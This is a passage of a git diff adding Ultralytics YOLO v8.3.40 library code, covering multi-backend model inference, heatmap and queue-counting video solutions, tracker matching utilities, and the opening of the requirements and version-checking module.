predictor.get_input_handle(predictor.get_input_names()[0]) + output_names = predictor.get_output_names() + metadata = w.parents[1] / "metadata.yaml" + + # MNN + elif mnn: + LOGGER.info(f"Loading {w} for MNN inference...") + check_requirements("MNN") # requires MNN + import os + + import MNN + + config = {} + config["precision"] = "low" + config["backend"] = "CPU" + config["numThread"] = (os.cpu_count() + 1) // 2 + rt = MNN.nn.create_runtime_manager((config,)) + net = MNN.nn.load_module_from_file(w, [], [], runtime_manager=rt, rearrange=True) + + def torch_to_mnn(x): + return MNN.expr.const(x.data_ptr(), x.shape) + + metadata = json.loads(net.get_info()["bizCode"]) + + # NCNN + elif ncnn: + LOGGER.info(f"Loading {w} for NCNN inference...") + check_requirements("git+https://github.com/Tencent/ncnn.git" if ARM64 else "ncnn") # requires NCNN + import ncnn as pyncnn + + net = pyncnn.Net() + net.opt.use_vulkan_compute = cuda + w = Path(w) + if not w.is_file(): # if not *.param + w = next(w.glob("*.param")) # get *.param file from *_ncnn_model dir + net.load_param(str(w)) + net.load_model(str(w.with_suffix(".bin"))) + metadata = w.parent / "metadata.yaml" + + # NVIDIA Triton Inference Server + elif triton: + check_requirements("tritonclient[all]") + from ultralytics.utils.triton import TritonRemoteModel + + model = TritonRemoteModel(w) + + # Any other format (unsupported) + else: + from ultralytics.engine.exporter import export_formats + + raise TypeError( + f"model='{w}' is not a supported model format. Ultralytics supports: {export_formats()['Format']}\n" + f"See https://docs.ultralytics.com/modes/predict for help." + ) + + # Load external metadata YAML + if isinstance(metadata, (str, Path)) and Path(metadata).exists(): + metadata = yaml_load(metadata) + if metadata and isinstance(metadata, dict): + for k, v in metadata.items(): + if k in {"stride", "batch"}: + metadata[k] = int(v) + elif k in {"imgsz", "names", "kpt_shape"} and isinstance(v, str): + metadata[k] = eval(v) + stride = metadata["stride"] + task = metadata["task"] + batch = metadata["batch"] + imgsz = metadata["imgsz"] + names = metadata["names"] + kpt_shape = metadata.get("kpt_shape") + elif not (pt or triton or nn_module): + LOGGER.warning(f"WARNING ⚠️ Metadata not found for 'model={weights}'") + + # Check names + if "names" not in locals(): # names missing + names = default_class_names(data) + names = check_class_names(names) + + # Disable gradients + if pt: + for p in model.parameters(): + p.requires_grad = False + + self.__dict__.update(locals()) # assign all variables to self + + def forward(self, im, augment=False, visualize=False, embed=None): + """ + Runs inference on the YOLOv8 MultiBackend model. + + Args: + im (torch.Tensor): The image tensor to perform inference on. + augment (bool): whether to perform data augmentation during inference, defaults to False + visualize (bool): whether to visualize the output predictions, defaults to False + embed (list, optional): A list of feature vectors/embeddings to return. + + Returns: + (tuple): Tuple containing the raw output tensor, and processed output for visualization (if visualize=True) + """ + b, ch, h, w = im.shape # batch, channel, height, width + if self.fp16 and im.dtype != torch.float16: + im = im.half() # to FP16 + if self.nhwc: + im = im.permute(0, 2, 3, 1) # torch BCHW to numpy BHWC shape(1,320,192,3) + + # PyTorch + if self.pt or self.nn_module: + y = self.model(im, augment=augment, visualize=visualize, embed=embed) + + # TorchScript + elif self.jit: + y = self.model(im) + + # ONNX OpenCV DNN + elif self.dnn: + im = im.cpu().numpy() # torch to numpy + self.net.setInput(im) + y = self.net.forward() + + # ONNX Runtime + elif self.onnx or self.imx: + if self.dynamic: + im = im.cpu().numpy() # torch to numpy + y = self.session.run(self.output_names, {self.session.get_inputs()[0].name: im}) + else: + if not self.cuda: + im = im.cpu() + self.io.bind_input( + name="images", + device_type=im.device.type, + device_id=im.device.index if im.device.type == "cuda" else 0, + element_type=np.float16 if self.fp16 else np.float32, + shape=tuple(im.shape), + buffer_ptr=im.data_ptr(), + ) + self.session.run_with_iobinding(self.io) + y = self.bindings + if self.imx: + # boxes, conf, cls + y = np.concatenate([y[0], y[1][:, :, None], y[2][:, :, None]], axis=-1) + + # OpenVINO + elif self.xml: + im = im.cpu().numpy() # FP32 + + if self.inference_mode in {"THROUGHPUT", "CUMULATIVE_THROUGHPUT"}: # optimized for larger batch-sizes + n = im.shape[0] # number of images in batch + results = [None] * n # preallocate list with None to match the number of images + + def callback(request, userdata): + """Places result in preallocated list using userdata index.""" + results[userdata] = request.results + + # Create AsyncInferQueue, set the callback and start asynchronous inference for each input image + async_queue = self.ov.runtime.AsyncInferQueue(self.ov_compiled_model) + async_queue.set_callback(callback) + for i in range(n): + # Start async inference with userdata=i to specify the position in results list + async_queue.start_async(inputs={self.input_name: im[i : i + 1]}, userdata=i) # keep image as BCHW + async_queue.wait_all() # wait for all inference requests to complete + y = np.concatenate([list(r.values())[0] for r in results]) + + else: # inference_mode = "LATENCY", optimized for fastest first result at batch-size 1 + y = list(self.ov_compiled_model(im).values()) + + # TensorRT + elif self.engine: + if self.dynamic and im.shape != self.bindings["images"].shape: + if self.is_trt10: + self.context.set_input_shape("images", im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + self.bindings[name].data.resize_(tuple(self.context.get_tensor_shape(name))) + else: + i = self.model.get_binding_index("images") + self.context.set_binding_shape(i, im.shape) + self.bindings["images"] = self.bindings["images"]._replace(shape=im.shape) + for name in self.output_names: + i = self.model.get_binding_index(name) + self.bindings[name].data.resize_(tuple(self.context.get_binding_shape(i))) + + s = self.bindings["images"].shape + assert im.shape == s, f"input size {im.shape} {'>' if self.dynamic else 'not equal to'} max model size {s}" + self.binding_addrs["images"] = int(im.data_ptr()) + self.context.execute_v2(list(self.binding_addrs.values())) + y = [self.bindings[x].data for x in sorted(self.output_names)] + + # CoreML + elif self.coreml: + im = im[0].cpu().numpy() + im_pil = Image.fromarray((im * 255).astype("uint8")) + # im = im.resize((192, 320), Image.BILINEAR) + y = self.model.predict({"image": im_pil}) # coordinates are xywh normalized + if "confidence" in y: + raise TypeError( + "Ultralytics only supports inference of non-pipelined CoreML models exported with " + f"'nms=False', but 'model={w}' has an NMS pipeline created by an 'nms=True' export." + ) + # TODO: CoreML NMS inference handling + # from ultralytics.utils.ops import xywh2xyxy + # box = xywh2xyxy(y['coordinates'] * [[w, h, w, h]]) # xyxy pixels + # conf, cls = y['confidence'].max(1), y['confidence'].argmax(1).astype(np.float32) + # y = np.concatenate((box, conf.reshape(-1, 1), cls.reshape(-1, 1)), 1) + elif len(y) == 1: # classification model + y = list(y.values()) + elif len(y) == 2: # segmentation model + y = list(reversed(y.values())) # reversed for segmentation models (pred, proto) + + # PaddlePaddle + elif self.paddle: + im = im.cpu().numpy().astype(np.float32) + self.input_handle.copy_from_cpu(im) + self.predictor.run() + y = [self.predictor.get_output_handle(x).copy_to_cpu() for x in self.output_names] + + # MNN + elif self.mnn: + input_var = self.torch_to_mnn(im) + output_var = self.net.onForward([input_var]) + y = [x.read() for x in output_var] + + # NCNN + elif self.ncnn: + mat_in = self.pyncnn.Mat(im[0].cpu().numpy()) + with self.net.create_extractor() as ex: + ex.input(self.net.input_names()[0], mat_in) + # WARNING: 'output_names' sorted as a temporary fix for https://github.com/pnnx/pnnx/issues/130 + y = [np.array(ex.extract(x)[1])[None] for x in sorted(self.net.output_names())] + + # NVIDIA Triton Inference Server + elif self.triton: + im = im.cpu().numpy() # torch to numpy + y = self.model(im) + + # TensorFlow (SavedModel, GraphDef, Lite, Edge TPU) + else: + im = im.cpu().numpy() + if self.saved_model: # SavedModel + y = self.model(im, training=False) if self.keras else self.model(im) + if not isinstance(y, list): + y = [y] + elif self.pb: # GraphDef + y = self.frozen_func(x=self.tf.constant(im)) + else: # Lite or Edge TPU + details = self.input_details[0] + is_int = details["dtype"] in {np.int8, np.int16} # is TFLite quantized int8 or int16 model + if is_int: + scale, zero_point = details["quantization"] + im = (im / scale + zero_point).astype(details["dtype"]) # de-scale + self.interpreter.set_tensor(details["index"], im) + self.interpreter.invoke() + y = [] + for output in self.output_details: + x = self.interpreter.get_tensor(output["index"]) + if is_int: + scale, zero_point = output["quantization"] + x = (x.astype(np.float32) - zero_point) * scale # re-scale + if x.ndim == 3: # if task is not classification, excluding masks (ndim=4) as well + # Denormalize xywh by image size. See https://github.com/ultralytics/ultralytics/pull/1695 + # xywh are normalized in TFLite/EdgeTPU to mitigate quantization error of integer models + if x.shape[-1] == 6: # end-to-end model + x[:, :, [0, 2]] *= w + x[:, :, [1, 3]] *= h + else: + x[:, [0, 2]] *= w + x[:, [1, 3]] *= h + if self.task == "pose": + x[:, 5::3] *= w + x[:, 6::3] *= h + y.append(x) + # TF segment fixes: export is reversed vs ONNX export and protos are transposed + if len(y) == 2: # segment with (det, proto) output order reversed + if len(y[1].shape) != 4: + y = list(reversed(y)) # should be y = (1, 116, 8400), (1, 160, 160, 32) + if y[1].shape[-1] == 6: # end-to-end model + y = [y[1]] + else: + y[1] = np.transpose(y[1], (0, 3, 1, 2)) # should be y = (1, 116, 8400), (1, 32, 160, 160) + y = [x if isinstance(x, np.ndarray) else x.numpy() for x in y] + + # for x in y: + # print(type(x), len(x)) if isinstance(x, (list, tuple)) else print(type(x), x.shape) # debug shapes + if isinstance(y, (list, tuple)): + if len(self.names) == 999 and (self.task == "segment" or len(y) == 2): # segments and names not defined + ip, ib = (0, 1) if len(y[0].shape) == 4 else (1, 0) # index of protos, boxes + nc = y[ib].shape[1] - y[ip].shape[3] - 4 # y = (1, 160, 160, 32), (1, 116, 8400) + self.names = {i: f"class{i}" for i in range(nc)} + return self.from_numpy(y[0]) if len(y) == 1 else [self.from_numpy(x) for x in y] + else: + return self.from_numpy(y) + + def from_numpy(self, x): + """ + Convert a numpy array to a tensor. + + Args: + x (np.ndarray): The array to be converted. + + Returns: + (torch.Tensor): The converted tensor + """ + return torch.tensor(x).to(self.device) if isinstance(x, np.ndarray) else x + + def warmup(self, imgsz=(1, 3, 640, 640)): + """ + Warm up the model by running one forward pass with a dummy input. + + Args: + imgsz (tuple): The shape of the dummy input tensor in the format (batch_size, channels, height, width) + """ + import torchvision # noqa (import here so torchvision import time not recorded in postprocess time) + + warmup_types = self.pt, self.jit, self.onnx, self.engine, self.saved_model, self.pb, self.triton, self.nn_module + if any(warmup_types) and (self.device.type != "cpu" or self.triton): + im = torch.empty(*imgsz, dtype=torch.half if self.fp16 else torch.float, device=self.device) # input + for _ in range(2 if self.jit else 1): + self.forward(im) # warmup + + @staticmethod + def _model_type(p="path/to/model.pt"): + """ + Takes a path to a model file and returns the model type. Possibles types are pt, jit, onnx, xml, engine, coreml, + saved_model, pb, tflite, edgetpu, tfjs, ncnn or paddle. + + Args: + p: path to the model file. Defaults to path/to/model.pt + + Examples: + >>> model = AutoBackend(weights="path/to/model.onnx") + >>> model_type = model._model_type() # returns "onnx" + """ + from ultralytics.engine.exporter import export_formats + + sf = export_formats()["Suffix"] # export suffixes + if not is_url(p) and not isinstance(p, str): + check_suffix(p, sf) # checks + name = Path(p).name + types = [s in name for s in sf] + types[5] |= name.endswith(".mlmodel") # retain support for older Apple CoreML *.mlmodel formats + types[8] &= not types[9] # tflite &= not edgetpu + if any(types): + triton = False + else: + from urllib.parse import urlsplit + + url = urlsplit(p) + triton = bool(url.netloc) and bool(url.path) and url.scheme in {"http", "grpc"} + + return types + [triton] diff --git a/2024.ultralytics/v8.3.40/solutions/heatmap.py b/2024.ultralytics/v8.3.40/solutions/heatmap.py new file mode 100644 index 0000000..c9dd808 --- /dev/null +++ b/2024.ultralytics/v8.3.40/solutions/heatmap.py @@ -0,0 +1,130 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import cv2 +import numpy as np + +from ultralytics.solutions.object_counter import ObjectCounter +from ultralytics.utils.plotting import Annotator + + +class Heatmap(ObjectCounter): + """ + A class to draw heatmaps in real-time video streams based on object tracks. + + This class extends the ObjectCounter class to generate and visualize heatmaps of object movements in video + streams. It uses tracked object positions to create a cumulative heatmap effect over time. + + Attributes: + initialized (bool): Flag indicating whether the heatmap has been initialized. + colormap (int): OpenCV colormap used for heatmap visualization. + heatmap (np.ndarray): Array storing the cumulative heatmap data. + annotator (Annotator): Object for drawing annotations on the image. + + Methods: + heatmap_effect: Calculates and updates the heatmap effect for a given bounding box. + generate_heatmap: Generates and applies the heatmap effect to each frame. + + Examples: + >>> from ultralytics.solutions import Heatmap + >>> heatmap = Heatmap(model="yolov8n.pt", colormap=cv2.COLORMAP_JET) + >>> results = heatmap("path/to/video.mp4") + >>> for result in results: + ... print(result.speed) # Print inference speed + ... cv2.imshow("Heatmap", result.plot()) + ... if cv2.waitKey(1) & 0xFF == ord("q"): + ... break + """ + + def __init__(self, **kwargs): + """Initializes the Heatmap class for real-time video stream heatmap generation based on object tracks.""" + super().__init__(**kwargs) + + self.initialized = False # bool variable for heatmap initialization + if self.region is not None: # check if user provided the region coordinates + self.initialize_region() + + # store colormap + self.colormap = cv2.COLORMAP_PARULA if self.CFG["colormap"] is None else self.CFG["colormap"] + + def heatmap_effect(self, box): + """ + Efficiently calculates heatmap area and effect location for applying colormap. + + Args: + box (List[float]): Bounding box coordinates [x0, y0, x1, y1]. + + Examples: + >>> heatmap = Heatmap() + >>> box = [100, 100, 200, 200] + >>> heatmap.heatmap_effect(box) + """ + x0, y0, x1, y1 = map(int, box) + radius_squared = (min(x1 - x0, y1 - y0) // 2) ** 2 + + # Create a meshgrid with region of interest (ROI) for vectorized distance calculations + xv, yv = np.meshgrid(np.arange(x0, x1), np.arange(y0, y1)) + + # Calculate squared distances from the center + dist_squared = (xv - ((x0 + x1) // 2)) ** 2 + (yv - ((y0 + y1) // 2)) ** 2 + + # Create a mask of points within the radius + within_radius = dist_squared <= radius_squared + + # Update only the values within the bounding box in a single vectorized operation + self.heatmap[y0:y1, x0:x1][within_radius] += 2 + + def generate_heatmap(self, im0): + """ + Generate heatmap for each frame using Ultralytics. + + Args: + im0 (np.ndarray): Input image array for processing. + + Returns: + (np.ndarray): Processed image with heatmap overlay and object counts (if region is specified). + + Examples: + >>> heatmap = Heatmap() + >>> im0 = cv2.imread("image.jpg") + >>> result = heatmap.generate_heatmap(im0) + """ + if not self.initialized: + self.heatmap = np.zeros_like(im0, dtype=np.float32) * 0.99 + self.initialized = True # Initialize heatmap only once + + self.annotator = Annotator(im0, line_width=self.line_width) # Initialize annotator + self.extract_tracks(im0) # Extract tracks + + # Iterate over bounding boxes, track ids and classes index + for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss): + # Draw bounding box and counting region + self.heatmap_effect(box) + + if self.region is not None: + self.annotator.draw_region(reg_pts=self.region, color=(104, 0, 123), thickness=self.line_width * 2) + self.store_tracking_history(track_id, box) # Store track history + self.store_classwise_counts(cls) # store classwise counts in dict + current_centroid = ((box[0] + box[2]) / 2, (box[1] + box[3]) / 2) + # Store tracking previous position and perform object counting + prev_position = None + if len(self.track_history[track_id]) > 1: + prev_position = self.track_history[track_id][-2] + self.count_objects(current_centroid, track_id, prev_position, cls) # Perform object counting + + if self.region is not None: + self.display_counts(im0) # Display the counts on the frame + + # Normalize, apply colormap to heatmap and combine with original image + if self.track_data.id is not None: + im0 = cv2.addWeighted( + im0, + 0.5, + cv2.applyColorMap( + cv2.normalize(self.heatmap, None, 0, 255, cv2.NORM_MINMAX).astype(np.uint8), self.colormap + ), + 0.5, + 0, + ) + + self.display_output(im0) # display output with base class function + return im0 # return output image for more usage diff --git a/2024.ultralytics/v8.3.40/solutions/queue_management.py b/2024.ultralytics/v8.3.40/solutions/queue_management.py new file mode 100644 index 0000000..ca0acb1 --- /dev/null +++ b/2024.ultralytics/v8.3.40/solutions/queue_management.py @@ -0,0 +1,109 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +from ultralytics.solutions.solutions import BaseSolution +from ultralytics.utils.plotting import Annotator, colors + + +class QueueManager(BaseSolution): + """ + Manages queue counting in real-time video streams based on object tracks. + + This class extends BaseSolution to provide functionality for tracking and counting objects within a specified + region in video frames. + + Attributes: + counts (int): The current count of objects in the queue. + rect_color (Tuple[int, int, int]): RGB color tuple for drawing the queue region rectangle. + region_length (int): The number of points defining the queue region. + annotator (Annotator): An instance of the Annotator class for drawing on frames. + track_line (List[Tuple[int, int]]): List of track line coordinates. + track_history (Dict[int, List[Tuple[int, int]]]): Dictionary storing tracking history for each object. + + Methods: + initialize_region: Initializes the queue region. + process_queue: Processes a single frame for queue management. + extract_tracks: Extracts object tracks from the current frame. + store_tracking_history: Stores the tracking history for an object. + display_output: Displays the processed output. + + Examples: + >>> queue_manager = QueueManager(source="video.mp4", region=[100, 100, 200, 200, 300, 300]) + >>> for frame in video_stream: + ... processed_frame = queue_manager.process_queue(frame) + ... cv2.imshow("Queue Management", processed_frame) + """ + + def __init__(self, **kwargs): + """Initializes the QueueManager with parameters for tracking and counting objects in a video stream.""" + super().__init__(**kwargs) + self.initialize_region() + self.counts = 0 # Queue counts Information + self.rect_color = (255, 255, 255) # Rectangle color + self.region_length = len(self.region) # Store region length for further usage + + def process_queue(self, im0): + """ + Processes the queue management for a single frame of video. + + Args: + im0 (numpy.ndarray): Input image for processing, typically a frame from a video stream. + + Returns: + (numpy.ndarray): Processed image with annotations, bounding boxes, and queue counts. + + This method performs the following steps: + 1. Resets the queue count for the current frame. + 2. Initializes an Annotator object for drawing on the image. + 3. Extracts tracks from the image. + 4. Draws the counting region on the image. + 5. For each detected object: + - Draws bounding boxes and labels. + - Stores tracking history. + - Draws centroids and tracks. + - Checks if the object is inside the counting region and updates the count. + 6. Displays the queue count on the image. + 7. Displays the processed output. + + Examples: + >>> queue_manager = QueueManager() + >>> frame = cv2.imread("frame.jpg") + >>> processed_frame = queue_manager.process_queue(frame) + """ + self.counts = 0 # Reset counts every frame + self.annotator = Annotator(im0, line_width=self.line_width) # Initialize annotator + self.extract_tracks(im0) # Extract tracks + + self.annotator.draw_region( + reg_pts=self.region, color=self.rect_color, thickness=self.line_width * 2 + ) # Draw region + + for box, track_id, cls in zip(self.boxes, self.track_ids, self.clss): + # Draw bounding box and counting region + self.annotator.box_label(box, label=self.names[cls], color=colors(track_id, True)) + self.store_tracking_history(track_id, box) # Store track history + + # Draw tracks of objects + self.annotator.draw_centroid_and_tracks( + self.track_line, color=colors(int(track_id), True), track_thickness=self.line_width + ) + + # Cache frequently accessed attributes + track_history = self.track_history.get(track_id, []) + + # store previous position of track and check if the object is inside the counting region + prev_position = None + if len(track_history) > 1: + prev_position = track_history[-2] + if self.region_length >= 3 and prev_position and self.r_s.contains(self.Point(self.track_line[-1])): + self.counts += 1 + + # Display queue counts + self.annotator.queue_counts_display( + f"Queue Counts : {str(self.counts)}", + points=self.region, + region_color=self.rect_color, + txt_color=(104, 31, 17), + ) + self.display_output(im0) # display output with base class function + + return im0 # return output image for more usage diff --git a/2024.ultralytics/v8.3.40/trackers/utils/matching.py b/2024.ultralytics/v8.3.40/trackers/utils/matching.py new file mode 100644 index 0000000..b062d93 --- /dev/null +++ b/2024.ultralytics/v8.3.40/trackers/utils/matching.py @@ -0,0 +1,157 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import numpy as np +import scipy +from scipy.spatial.distance import cdist + +from ultralytics.utils.metrics import batch_probiou, bbox_ioa + +try: + import lap # for linear_assignment + + assert lap.__version__ # verify package is not directory +except (ImportError, AssertionError, AttributeError): + from ultralytics.utils.checks import check_requirements + + check_requirements("lapx>=0.5.2") # update to lap package from https://github.com/rathaROG/lapx + import lap + + +def linear_assignment(cost_matrix: np.ndarray, thresh: float, use_lap: bool = True) -> tuple: + """ + Perform linear assignment using either the scipy or lap.lapjv method. + + Args: + cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M). + thresh (float): Threshold for considering an assignment valid. + use_lap (bool): Use lap.lapjv for the assignment. If False, scipy.optimize.linear_sum_assignment is used. + + Returns: + matched_indices (np.ndarray): Array of matched indices of shape (K, 2), where K is the number of matches. + unmatched_a (np.ndarray): Array of unmatched indices from the first set, with shape (L,). + unmatched_b (np.ndarray): Array of unmatched indices from the second set, with shape (M,). + + Examples: + >>> cost_matrix = np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]]) + >>> thresh = 5.0 + >>> matched_indices, unmatched_a, unmatched_b = linear_assignment(cost_matrix, thresh, use_lap=True) + """ + if cost_matrix.size == 0: + return np.empty((0, 2), dtype=int), tuple(range(cost_matrix.shape[0])), tuple(range(cost_matrix.shape[1])) + + if use_lap: + # Use lap.lapjv + # https://github.com/gatagat/lap + _, x, y = lap.lapjv(cost_matrix, extend_cost=True, cost_limit=thresh) + matches = [[ix, mx] for ix, mx in enumerate(x) if mx >= 0] + unmatched_a = np.where(x < 0)[0] + unmatched_b = np.where(y < 0)[0] + else: + # Use scipy.optimize.linear_sum_assignment + # https://docs.scipy.org/doc/scipy/reference/generated/scipy.optimize.linear_sum_assignment.html + x, y = scipy.optimize.linear_sum_assignment(cost_matrix) # row x, col y + matches = np.asarray([[x[i], y[i]] for i in range(len(x)) if cost_matrix[x[i], y[i]] <= thresh]) + if len(matches) == 0: + unmatched_a = list(np.arange(cost_matrix.shape[0])) + unmatched_b = list(np.arange(cost_matrix.shape[1])) + else: + unmatched_a = list(set(np.arange(cost_matrix.shape[0])) - set(matches[:, 0])) + unmatched_b = list(set(np.arange(cost_matrix.shape[1])) - set(matches[:, 1])) + + return matches, unmatched_a, unmatched_b + + +def iou_distance(atracks: list, btracks: list) -> np.ndarray: + """ + Compute cost based on Intersection over Union (IoU) between tracks. + + Args: + atracks (list[STrack] | list[np.ndarray]): List of tracks 'a' or bounding boxes. + btracks (list[STrack] | list[np.ndarray]): List of tracks 'b' or bounding boxes. + + Returns: + (np.ndarray): Cost matrix computed based on IoU. + + Examples: + Compute IoU distance between two sets of tracks + >>> atracks = [np.array([0, 0, 10, 10]), np.array([20, 20, 30, 30])] + >>> btracks = [np.array([5, 5, 15, 15]), np.array([25, 25, 35, 35])] + >>> cost_matrix = iou_distance(atracks, btracks) + """ + if atracks and isinstance(atracks[0], np.ndarray) or btracks and isinstance(btracks[0], np.ndarray): + atlbrs = atracks + btlbrs = btracks + else: + atlbrs = [track.xywha if track.angle is not None else track.xyxy for track in atracks] + btlbrs = [track.xywha if track.angle is not None else track.xyxy for track in btracks] + + ious = np.zeros((len(atlbrs), len(btlbrs)), dtype=np.float32) + if len(atlbrs) and len(btlbrs): + if len(atlbrs[0]) == 5 and len(btlbrs[0]) == 5: + ious = batch_probiou( + np.ascontiguousarray(atlbrs, dtype=np.float32), + np.ascontiguousarray(btlbrs, dtype=np.float32), + ).numpy() + else: + ious = bbox_ioa( + np.ascontiguousarray(atlbrs, dtype=np.float32), + np.ascontiguousarray(btlbrs, dtype=np.float32), + iou=True, + ) + return 1 - ious # cost matrix + + +def embedding_distance(tracks: list, detections: list, metric: str = "cosine") -> np.ndarray: + """ + Compute distance between tracks and detections based on embeddings. + + Args: + tracks (list[STrack]): List of tracks, where each track contains embedding features. + detections (list[BaseTrack]): List of detections, where each detection contains embedding features. + metric (str): Metric for distance computation. Supported metrics include 'cosine', 'euclidean', etc. + + Returns: + (np.ndarray): Cost matrix computed based on embeddings with shape (N, M), where N is the number of tracks + and M is the number of detections. + + Examples: + Compute the embedding distance between tracks and detections using cosine metric + >>> tracks = [STrack(...), STrack(...)] # List of track objects with embedding features + >>> detections = [BaseTrack(...), BaseTrack(...)] # List of detection objects with embedding features + >>> cost_matrix = embedding_distance(tracks, detections, metric="cosine") + """ + cost_matrix = np.zeros((len(tracks), len(detections)), dtype=np.float32) + if cost_matrix.size == 0: + return cost_matrix + det_features = np.asarray([track.curr_feat for track in detections], dtype=np.float32) + # for i, track in enumerate(tracks): + # cost_matrix[i, :] = np.maximum(0.0, cdist(track.smooth_feat.reshape(1,-1), det_features, metric)) + track_features = np.asarray([track.smooth_feat for track in tracks], dtype=np.float32) + cost_matrix = np.maximum(0.0, cdist(track_features, det_features, metric)) # Normalized features + return cost_matrix + + +def fuse_score(cost_matrix: np.ndarray, detections: list) -> np.ndarray: + """ + Fuses cost matrix with detection scores to produce a single similarity matrix. + + Args: + cost_matrix (np.ndarray): The matrix containing cost values for assignments, with shape (N, M). + detections (list[BaseTrack]): List of detections, each containing a score attribute. + + Returns: + (np.ndarray): Fused similarity matrix with shape (N, M). + + Examples: + Fuse a cost matrix with detection scores + >>> cost_matrix = np.random.rand(5, 10) # 5 tracks and 10 detections + >>> detections = [BaseTrack(score=np.random.rand()) for _ in range(10)] + >>> fused_matrix = fuse_score(cost_matrix, detections) + """ + if cost_matrix.size == 0: + return cost_matrix + iou_sim = 1 - cost_matrix + det_scores = np.array([det.score for det in detections]) + det_scores = np.expand_dims(det_scores, axis=0).repeat(cost_matrix.shape[0], axis=0) + fuse_sim = iou_sim * det_scores + return 1 - fuse_sim # fuse_cost diff --git a/2024.ultralytics/v8.3.40/utils/checks.py b/2024.ultralytics/v8.3.40/utils/checks.py new file mode 100644 index 0000000..3a8201a --- /dev/null +++ b/2024.ultralytics/v8.3.40/utils/checks.py @@ -0,0 +1,776 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license + +import glob +import inspect +import math +import os +import platform +import re +import shutil +import subprocess +import time +from importlib import metadata +from pathlib import Path +from typing import Optional + +import cv2 +import numpy as np +import requests +import torch + +from ultralytics.utils import ( + ASSETS, + AUTOINSTALL, + IS_COLAB, + IS_GIT_DIR, + IS_KAGGLE, + IS_PIP_PACKAGE, + LINUX, + LOGGER, + MACOS, + ONLINE, + PYTHON_VERSION, + ROOT, + TORCHVISION_VERSION, + USER_CONFIG_DIR, + WINDOWS, + Retry, + SimpleNamespace, + ThreadingLocked, + TryExcept, + clean_url, + colorstr, + downloads, + emojis, + is_github_action_running, + url2file, +) + + +def parse_requirements(file_path=ROOT.parent / "requirements.txt", package=""): + """ + Parse a requirements.txt file, ignoring lines that start with '#' and any text after '#'. + + Args: + file_path (Path): Path to the requirements.txt file. + package (str, optional): Python package to use instead of requirements.txt file, i.e. package='ultralytics'. + + Returns: + (List[Dict[str, str]]): List of parsed requirements as dictionaries with `name` and `specifier` keys. + + Example: + ```python + from ultralytics.utils.checks import parse_requirements + + parse_requirements(package="ultralytics") + ``` + """ + if package: + requires = [x for x in metadata.distribution(package).requires if "extra == " not in x] + else: + requires = Path(file_path).read_text().splitlines() + + requirements = [] + for line in requires: + line = line.strip() + if line and not line.startswith("#"): + line = line.split("#")[0].strip() # ignore inline comments + match = re.match(r"([a-zA-Z0-9-_]+)\s*([<>!=~]+.*)?", line) + if match: + requirements.append(SimpleNamespace(name=match[1], specifier=match[2].strip() if match[2] else "")) + + return requirements + + +def parse_version(version="0.0.0") -> tuple: + """ + Convert a version string to a tuple of integers, ignoring any extra non-numeric string attached to the version. This + function replaces deprecated 'pkg_resources.parse_version(v)'. + + Args: + version (str): Version string, i.e. '2.0.1+cpu' + + Returns: + (tuple): Tuple of integers representing the numeric part of the version and the extra string, i.e. (2, 0, 1) + """ + try: + return tuple(map(int, re.findall(r"\d+", version)[:3])) # '2.0.1+cpu' -> (2, 0, 1) + except Exception as e: + LOGGER.warning(f"WARNING ⚠️ failure for parse_version({version}), returning (0, 0, 0): {e}") + return 0, 0, 0 + + +def is_ascii(s) -> bool: + """ + Check if a string is composed of only ASCII characters. + + Args: + s (str): String to be checked. + + Returns: + (bool): True if the string is composed only of ASCII characters, False otherwise. + """ + # Convert list, tuple, None, etc. to string + s = str(s) + + # Check if the string is composed of only ASCII characters + return all(ord(c) < 128 for c in s) + + +def check_imgsz(imgsz, stride=32, min_dim=1, max_dim=2, floor=0): + """ + Verify image size is a multiple of the given stride in each dimension. If the image size is not a multiple of the + stride, update it to the nearest multiple of the stride that is greater than or equal to the given floor value. + + Args: + imgsz (int | cList[int]): Image size. + stride (int): Stride value. + min_dim (int): Minimum number of dimensions. + max_dim (int): Maximum number of dimensions. + floor (int): Minimum allowed value for image size. + + Returns: + (List[int]): Updated image size. + """ + # Convert stride to integer if it is a tensor + stride = int(stride.max() if isinstance(stride, torch.Tensor) else stride) + + # Convert image size to list if it is an integer + if isinstance(imgsz, int): + imgsz = [imgsz] + elif isinstance(imgsz, (list, tuple)): + imgsz = list(imgsz) + elif isinstance(imgsz, str): # i.e. '640' or '[640,640]' + imgsz = [int(imgsz)] if imgsz.isnumeric() else eval(imgsz) + else: + raise TypeError( + f"'imgsz={imgsz}' is of invalid type {type(imgsz).__name__}. " + f"Valid imgsz types are int i.e. 'imgsz=640' or list i.e. 'imgsz=[640,640]'" + ) + + # Apply max_dim + if len(imgsz) > max_dim: + msg = ( + "'train' and 'val' imgsz must be an integer, while 'predict' and 'export' imgsz may be a [h, w] list " + "or an integer, i.e. 'yolo export imgsz=640,480' or 'yolo export imgsz=640'" + ) + if max_dim != 1: + raise ValueError(f"imgsz={imgsz} is not a valid image size. {msg}") + LOGGER.warning(f"WARNING ⚠️ updating to 'imgsz={max(imgsz)}'. {msg}") + imgsz = [max(imgsz)] + # Make image size a multiple of the stride + sz = [max(math.ceil(x / stride) * stride, floor) for x in imgsz] + + # Print warning message if image size was updated + if sz != imgsz: + LOGGER.warning(f"WARNING ⚠️ imgsz={imgsz} must be multiple of max stride {stride}, updating to {sz}") + + # Add missing dimensions if necessary + sz = [sz[0], sz[0]] if min_dim == 2 and len(sz) == 1 else sz[0] if min_dim == 1 and len(sz) == 1 else sz + + return sz + + +def check_version( + current: str = "0.0.0", + required: str = "0.0.0", + name: str = "version", + hard: bool = False, + verbose: bool = False, + msg: str = "", +) -> bool: + """ + Check current version against the required version or range. + + Args: + current (str): Current version or package name to get version from. + required (str): Required version or range (in pip-style format). + name (str, optional): Name to be used in warning message. + hard (bool, optional): If True, raise an AssertionError if the requirement is not met. + verbose (bool, optional): If True, print warning message if requirement is not met. + msg (str, optional): Extra message to display if verbose. + + Returns: + (bool): True if requirement is met, False otherwise. + + Example: + ```python + # Check if current version is exactly 22.04 + check_version(current="22.04", required="==22.04") + + # Check if current version is greater than or equal to 22.04 + check_version(current="22.10", required="22.04") # assumes '>=' inequality if none 